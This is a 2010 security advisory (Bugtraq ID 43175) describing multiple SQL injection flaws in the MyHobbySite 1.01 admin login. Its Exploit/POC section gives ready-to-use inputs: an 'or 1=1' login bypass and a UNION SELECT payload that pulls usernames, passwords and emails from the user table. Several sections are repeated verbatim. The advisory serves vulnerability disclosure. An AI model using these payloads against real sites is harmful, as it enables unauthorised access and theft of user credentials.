MyHobbySite Admin Login Multiple SQL Injection Vulnerabilities
BID:43175
Info
MyHobbySite Admin Login Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 43175 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 12 2010 12:00AM |
| Updated: | Sep 12 2010 12:00AM |
| Credit: | YuGj VN |
| Vulnerable: |
MyHobbySite MyHobbySite 1.01 |
| Not Vulnerable: | |
Discussion
MyHobbySite Admin Login Multiple SQL Injection Vulnerabilities
MyHobbySite is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
MyHobbySite 1.01 is vulnerable; other versions may also be affected.
MyHobbySite is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
MyHobbySite 1.01 is vulnerable; other versions may also be affected.
Exploit / POC
MyHobbySite Admin Login Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example inputs are available:
Username: a' or '1'='1
Password: a' or '1'='1
or
Username: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
Password: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
Attackers can use a browser to exploit these issues.
The following example inputs are available:
Username: a' or '1'='1
Password: a' or '1'='1
or
Username: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
Password: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
Solution / Fix
MyHobbySite Admin Login Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
MyHobbySite Admin Login Multiple SQL Injection Vulnerabilities
References:
References:
- MyHobbySite Homepage (MyHobbySite)